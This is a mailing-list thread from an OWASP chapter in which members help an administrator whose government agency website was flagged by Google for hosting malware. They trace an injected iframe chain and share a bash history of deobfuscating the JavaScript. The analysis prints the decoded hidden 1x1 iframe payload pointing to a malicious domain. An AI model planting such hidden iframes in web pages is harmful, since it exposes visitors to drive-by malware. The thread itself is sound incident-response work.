[Owasp-Malaysia] Malware Detected!

Hazrul Hamzah hazrul at hazrulnz.net
Tue Feb 8 22:51:41 EST 2011


For Mr. Syamsuri,

The ideal situation is you have the resources (time and manpower of
course) to examine the logs yourself. In that case you can have all the
information and findings contained within your org.

The best or practical situation is for you to submit the log to mycert.
Can ask our friend Mr.Adli on the duration or any TOC of the analysis.

For out-of-this-world-and-last-resort situation, maybe some of our friends
here can do the analysis for you.

Analysing logs is not that difficult if you're assisted by right tools
(and of course know what are you looking for) and it is not that straight
to the point as well ;)

For analysis, the 4W and 1H need to be answered for the analysis to be
concluded..

Cheers
> Hi Mohd Syamsuri,
>
> you can send the access log to mycert at mycert.org.my for further analysis
> :)
>
> Thanks
>
> On 9 February 2011 10:54, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> I still searching for the source..
>> last week i ask practical student to upload images on the site...
>> after they have finish the job than uncle G block my site.
>> I have "quarantine" their laptop... :p
>>
>> ** kesian budak-budak IT Malaysia. Mereka hanya di ajar utk lulus
>> exam...
>>
>> On Wed, Feb 9, 2011 at 9:45 AM, Sharuzzaman Ahmat Raslan
>> <sharuzzaman at gmail.com> wrote:
>>>
>>> Please check how the line got injected into your system.
>>>
>>> You need to find the source of the problem to make sure it will not
>>> happen
>>> again.
>>>
>>>
>>>
>>> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com>
>>> wrote:
>>>>
>>>> Mr Adnan thanks for the info and guide..
>>>>
>>>> I have clean all the mess and the site is up and running again..
>>>>
>>>> thanks to all too..
>>>>
>>>> ** I will blog this so others can make it as a guide...
>>>>
>>>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor
>>>> <adnan.shukor at gmail.com> wrote:
>>>>>
>>>>> mamp <= LOL typo.. it should be nano
>>>>> js <= one of hte binary in Spidermonkey. get the patched version
>>>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>>>> working on MacOS/Darwin, apply this patch
>>>>>
>>>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>>>
>>>>> thanks
>>>>>
>>>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>>>> <sharuzzaman at gmail.com> wrote:
>>>>> > I can see 2 interesting apps/scripts:
>>>>> >
>>>>> > 1. mamp
>>>>> > 2. /opt/analysis/js/js
>>>>> >
>>>>> > care to share? hopefully it is open source ;)
>>>>> >
>>>>> >
>>>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>>>> > <adnan.shukor at gmail.com> wrote:
>>>>> >>
>>>>> >> Here is my bash history:
>>>>> >>
>>>>> >> xanda:tmp adnan$ history
>>>>> >> <snip>
>>>>> >>  500  cd /tmp
>>>>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>>>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>>>> >>  503  nano indexsedc.php
>>>>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>>>> >>  505  mamp indexsedc.php.1
>>>>> >>  506  nano indexsedc.php.1
>>>>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>>>>> >>  508  nano sedc.php
>>>>> >>  509  wget http://www2.pkink.gov.my/default.php
>>>>> >>  510  nano default.php
>>>>> >>  511  nano default.php
>>>>> >>  512  clear
>>>>> >> <I've remove tags and leave clean JavaScript inside>
>>>>> >>  513  mv default.php default.txt
>>>>> >>  514  /opt/analysis/js/js < default.txt
>>>>> >>  515  cat write.log
>>>>> >>  516  history
>>>>> >> xanda:tmp adnan$
>>>>> >>
>>>>> >> Below is the output of the cat:
>>>>> >> [output]
>>>>> >> xanda:tmp adnan$ cat write.log
>>>>> >> <iframe width="1" height="1"
>>>>> >>
>>>>> >>
>>>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
>>>>> >> width="1" height="1"
>>>>> >>
>>>>> >>
>>>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>>>>> >> [/output]
>>>>> >>
>>>>> >>
>>>>> >> Hint: you might use modified version of spidermonkey to
>>>>> 'understand'
>>>>> >> the javascript
>>>>> >>
>>>>> >> Thanks
>>>>> >>
>>>>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com>
>>>>> wrote:
>>>>> >> > thanks for the info..
>>>>> >> > i will check all the file.
>>>>> >> >
>>>>> >> > how you found it?
>>>>> >> >
>>>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>>>> >> > <adnan.shukor at gmail.com> wrote:
>>>>> >> >>
>>>>> >> >> Here is the flow:
>>>>> >> >>
>>>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>>>> >> >> 2) and your sedc.php has an iframe to default.php
>>>>> >> >> 3) and in default.php (look at the last 2 lines), javascript
>>>>> will
>>>>> >> >> actually create an iframe to
>>>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>>> >> >>
>>>>> >> >> thanks :)
>>>>> >> >>
>>>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
>>>>> >> >> wrote:
>>>>> >> >> > can you point...
>>>>> >> >> > my index.htm or indexsedc.php or other file?
>>>>> >> >> >
>>>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>>>> >> >> > <adnan.shukor at gmail.com> wrote:
>>>>> >> >> >>
>>>>> >> >> >> you have iframe pointed to
>>>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>>> >> >> >>
>>>>> >> >> >> which is not xss :)
>>>>> >> >> >>
>>>>> >> >> >> >From my personal point of view, its either caused by:
>>>>> >> >> >> 1) malware on pc which has been used for ftp/access to the
>>>>> >> >> >> server
>>>>> >> >> >> 2) compromised server
>>>>> >> >> >>
>>>>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>>>>> >> >> >> mycert at mycert.org.my for further analysis :)
>>>>> >> >> >>
>>>>> >> >> >> thanks
>>>>> >> >> >>
>>>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri
>>>>> <msyamsuri at gmail.com>
>>>>> >> >> >> wrote:
>>>>> >> >> >> > I have check it.
>>>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy
>>>>> >> >> >> > <rastaboyz at gmail.com>
>>>>> >> >> >> > wrote:
>>>>> >> >> >> >>
>>>>> >> >> >> >> Hi Mohd Symsuri,
>>>>> >> >> >> >>
>>>>> >> >> >> >> Why dont you check on the reason why its being blocked,
>>>>> it
>>>>> >> >> >> >> might
>>>>> >> >> >> >> help.
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>>>> >> >> >> >>
>>>>> >> >> >> >> Regards,
>>>>> >> >> >> >> Kishur
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>>>>> >> >> >> >> <msyamsuri at gmail.com>
>>>>> >> >> >> >> wrote:
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>>>>> >> >> >> >>> I need some advise.
>>>>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>>>>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google
>>>>> for
>>>>> >> >> >> >>> almost
>>>>> >> >> >> >>> 4
>>>>> >> >> >> >>> days.
>>>>> >> >> >> >>> It said that we host malware on our server Malware
>>>>> >> >> >> >>> Detected! (
>>>>> >> >> >> >>> Google
>>>>> >> >> >> >>> said that!!)
>>>>> >> >> >> >>> What i did is..
>>>>> >> >> >> >>> 1. Scan all the data and upload a new data
>>>>> >> >> >> >>> 2. Check the index.html or index.php
>>>>> >> >> >> >>> 3. Scan using web scanner using
>>>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>>>> >> >> >> >>> http://www.virustotal.com
>>>>> >> >> >> >>> but still get block..
>>>>> >> >> >> >>> Googel said Suspected injected code
>>>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>>>>> >> >> >> >>> NAME="confcontent"
>>>>> >> >> >> >>> scrolling=yes >
>>>>> >> >> >> >>> I have using this code for almost 2 years
>>>>> >> >> >> >>> What should i do now?
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> --
>>>>> >> >> >> >>> best regard
>>>>> >> >> >> >>> syamsuri
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> _______________________________________________
>>>>> >> >> >> >>> Owasp-Malaysia mailing list
>>>>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>>>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> OWASP Malaysia Wiki
>>>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >> _______________________________________________
>>>>> >> >> >> >> Owasp-Malaysia mailing list
>>>>> >> >> >> >> Owasp-Malaysia at lists.owasp.org
>>>>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >> >> >>
>>>>> >> >> >> >> OWASP Malaysia Wiki
>>>>> >> >> >> >> http://www.owasp.org/index.php/Malaysia
>>>>> >> >> >> >>
>>>>> >> >> >> >> OWASP Malaysia Wiki Facebook
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> > --
>>>>> >> >> >> > best regard
>>>>> >> >> >> > syamsuri
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> > _______________________________________________
>>>>> >> >> >> > Owasp-Malaysia mailing list
>>>>> >> >> >> > Owasp-Malaysia at lists.owasp.org
>>>>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >> >> >
>>>>> >> >> >> > OWASP Malaysia Wiki
>>>>> >> >> >> > http://www.owasp.org/index.php/Malaysia
>>>>> >> >> >> >
>>>>> >> >> >> > OWASP Malaysia Wiki Facebook
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >> >> >
>>>>> >> >> >> _______________________________________________
>>>>> >> >> >> Owasp-Malaysia mailing list
>>>>> >> >> >> Owasp-Malaysia at lists.owasp.org
>>>>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >> >>
>>>>> >> >> >> OWASP Malaysia Wiki
>>>>> >> >> >> http://www.owasp.org/index.php/Malaysia
>>>>> >> >> >>
>>>>> >> >> >> OWASP Malaysia Wiki Facebook
>>>>> >> >> >>
>>>>> >> >> >>
>>>>> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> > --
>>>>> >> >> > best regard
>>>>> >> >> > syamsuri
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> > _______________________________________________
>>>>> >> >> > Owasp-Malaysia mailing list
>>>>> >> >> > Owasp-Malaysia at lists.owasp.org
>>>>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >> >
>>>>> >> >> > OWASP Malaysia Wiki
>>>>> >> >> > http://www.owasp.org/index.php/Malaysia
>>>>> >> >> >
>>>>> >> >> > OWASP Malaysia Wiki Facebook
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >> >
>>>>> >> >> _______________________________________________
>>>>> >> >> Owasp-Malaysia mailing list
>>>>> >> >> Owasp-Malaysia at lists.owasp.org
>>>>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >>
>>>>> >> >> OWASP Malaysia Wiki
>>>>> >> >> http://www.owasp.org/index.php/Malaysia
>>>>> >> >>
>>>>> >> >> OWASP Malaysia Wiki Facebook
>>>>> >> >>
>>>>> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >
>>>>> >> >
>>>>> >> >
>>>>> >> > --
>>>>> >> > best regard
>>>>> >> > syamsuri
>>>>> >> >
>>>>> >> >
>>>>> >> >
>>>>> >> > _______________________________________________
>>>>> >> > Owasp-Malaysia mailing list
>>>>> >> > Owasp-Malaysia at lists.owasp.org
>>>>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >
>>>>> >> > OWASP Malaysia Wiki
>>>>> >> > http://www.owasp.org/index.php/Malaysia
>>>>> >> >
>>>>> >> > OWASP Malaysia Wiki Facebook
>>>>> >> >
>>>>> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >
>>>>> >> _______________________________________________
>>>>> >> Owasp-Malaysia mailing list
>>>>> >> Owasp-Malaysia at lists.owasp.org
>>>>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >>
>>>>> >> OWASP Malaysia Wiki
>>>>> >> http://www.owasp.org/index.php/Malaysia
>>>>> >>
>>>>> >> OWASP Malaysia Wiki Facebook
>>>>> >>
>>>>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >
>>>>> >
>>>>> >
>>>>> > --
>>>>> > Sharuzzaman Ahmat Raslan
>>>>> >
>>>>> > _______________________________________________
>>>>> > Owasp-Malaysia mailing list
>>>>> > Owasp-Malaysia at lists.owasp.org
>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >
>>>>> > OWASP Malaysia Wiki
>>>>> > http://www.owasp.org/index.php/Malaysia
>>>>> >
>>>>> > OWASP Malaysia Wiki Facebook
>>>>> >
>>>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >
>>>>> _______________________________________________
>>>>> Owasp-Malaysia mailing list
>>>>> Owasp-Malaysia at lists.owasp.org
>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>
>>>>> OWASP Malaysia Wiki
>>>>> http://www.owasp.org/index.php/Malaysia
>>>>>
>>>>> OWASP Malaysia Wiki Facebook
>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>
>>>>
>>>>
>>>> --
>>>> best regard
>>>> syamsuri
>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> Owasp-Malaysia mailing list
>>>> Owasp-Malaysia at lists.owasp.org
>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>
>>>> OWASP Malaysia Wiki
>>>> http://www.owasp.org/index.php/Malaysia
>>>>
>>>> OWASP Malaysia Wiki Facebook
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>
>>>
>>>
>>> --
>>> Sharuzzaman Ahmat Raslan
>>>
>>> _______________________________________________
>>> Owasp-Malaysia mailing list
>>> Owasp-Malaysia at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>
>>> OWASP Malaysia Wiki
>>> http://www.owasp.org/index.php/Malaysia
>>>
>>> OWASP Malaysia Wiki Facebook
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>>
>>
>> --
>> best regard
>> syamsuri
>>
>>
>>
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>




More information about the Owasp-Malaysia mailing list